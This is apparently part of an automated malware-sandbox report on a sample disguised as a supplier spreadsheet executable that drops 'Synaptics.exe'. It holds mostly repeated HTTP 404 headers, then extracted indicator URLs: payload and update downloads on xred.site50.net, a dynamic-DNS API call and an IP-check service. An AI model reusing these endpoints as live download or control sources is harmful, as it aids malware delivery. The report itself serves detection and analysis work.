                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Yyo7t_mivK2xbUUjs9OEev3EW2eaRiD1qP-QNNAA_yRFAutez8eqa0PXQX5A1I5MRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:24 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-tYz4_gViYQR-hThAo-hO7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zdLmaJDrqe4Lny51vZ7uYhNkt3qqf5UbP1eNJfuITUTLHJne6mglvD33LBi77BhoOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1Z9lp4RMkz4ZzILtbiW42Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6HBJx5c5y2cII9vOEVh2ZkPWHXDQHkaD2M43jUy8si6gxWEYhptGBC91O9Jq8JSKZBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:26 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-20Up88Qz9RebNg4aCshwgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4K3LrapuNXSSyTEsokEvIZ9CPckEYgW54fjyxpp_kwXN7gFp2uMuz3rCp-fRcNF8-kkEuBD7kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:26 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-anoBirZ90kCUANZmbJm-fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6EQYHYMUZBKYpyCKfeosMOww0EZI28RzcqalhVFwrPzwI5R6WnfuaaH7vDzbbD7-0UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:27 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-39x7-JdhmhN0Zs_9_Eu3ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7SUMq9-O_oN1hcpt_-O17tpLTFeK0b2GEzEpVwaJDJ079IQbnN1qXOf5G7LRMNS0iBjiaP_yMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:27 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-rjUY-6Z4irFyqqbnBj_uhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OAnisgPUgwtHfGedXVtwueot4s7kDeXM2iAh4_zEdsKbtD2mdb-Zn0gmCrupcNerzpDvft08Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TKg9UAIDFxI15YZ_8Uh6Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5cBSJBlGNe2M338oyPRFCN61tusA-lRGTKtbbw9e1kjagFEnbLIwBdntMbz5RHFpitDB4vOqMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-mxXBqobfgtbZ-Iz5KCR5dA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hcRaotB85awLW8Jb7XJOot674Y_mSH0E6TD5_9dTf53UufXllM-jPIO9VRAC2wkxQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-HEOajIdQRMJe3V6JNEx4qg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5meiXpMvrWN1iWoBj4Ncap6ZIapy2pLnEw1jS2hqmvr8BttJwe2oq-JwBk1a1v9M31Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:30 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-IHEG3_KI7_Sg6CkDcqvJng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4gvqIdAY5qXbnm3yY6QFo_usM9aZdJVyCzZHgC0mUvH1l8Ba6mToMWsrOJ8xiicUvk0b5nXbQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-jl884KnxyVBC5Azazuj8IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45Qb11Lwljhb8x2ZM9OZhtyf_Ooo5vtuaum_Ai-ydoPt8hfG8_wa2pyH6rpEws7aHPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:31 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-XhW0vGcxCfp9wO0lv8i5uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6v0aWumbYDI7cKsNkYfKAbN5h37_jaMKOjWdXEWLyZqCE8qwjSo1vRwEohIeOUIfHLceFn2LIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-15_EIfn6xll7z5W-1tyo5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n-tmSR7Zn0upDr1WBwhYoNb2yQBYI-SvCAxECqeEIAVTrz67dMkPJJ5FGXEfKToGPGCbQRlsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-T-uNSELM5p0B4HiFDjPHxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ZXv9oNA7Y-XZZJe4OeASFJx4NvYgDwSWz1CVJWNUwbhfMXnCBpTNlZAOqJcARLAB3Rk0aL2QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-94vaIbHcTthzyZy8agROgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78QJF3O3hjFSacub5RmmcHZ1r6YcvBnD8EUKuvemVrQ3i6gw82M25-vZ0NLyIU5pVEC_zKMbwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:34 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-0RJjXbhLdygUQh5Ppi2LIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5H7VPPxE1aLTw5eb0_0wtzu6agzQYpdHIMasVasZAQxWHZqJXlQtoDd6UOQUZ1WGcxT6GQoLgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-_HQAEjjrF5oeJIO3Vtgmmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4y1D45GmMjch26qEnVFScm7LQvNPewpehh6SetJHAwpnQloB_AshU85Yr4-URJXJSdbC1UrHAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ddDYmSGA2ufNO0-_IL6KgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: RCXC902.tmp.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2488675062.00000000017EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                                Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: RCXC902.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: RCXC902.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini01
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: RCXC902.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar4
                                Source: Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.gooXZ
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F10C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/%
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
